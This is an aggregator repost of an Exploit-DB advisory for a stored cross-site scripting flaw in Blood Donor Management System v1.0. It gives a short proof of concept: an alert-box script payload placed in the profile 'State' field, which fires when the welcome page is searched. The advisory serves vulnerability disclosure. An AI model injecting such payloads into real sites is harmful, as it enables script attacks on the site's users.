3

[webapps] Blood Donor Management System v1.0 - Stored XSS

 9 months ago
source link: https://www.exploit-db.com/exploits/51697
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Blood Donor Management System v1.0 - Stored XSS

EDB-ID:

51697

EDB Verified:

Platform:

PHP

Date:

2023-09-04

Vulnerable App:

# Exploit Title: Blood Donor Management System v1.0 - Stored XSS
# Application: Blood Donor Management System
# Version: v1.0   
# Bugs:  Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/
# Date: 15.08.2023
# Author: Ehlullah Albayrak
# Tested on: Windows


#POC
========================================
1. Login to user account
2. Go to Profile 
3. Change "State" input and add "<script>alert("xss")</script>" payload.
4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered.

#Payload: <script>alert("xss")</script>

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK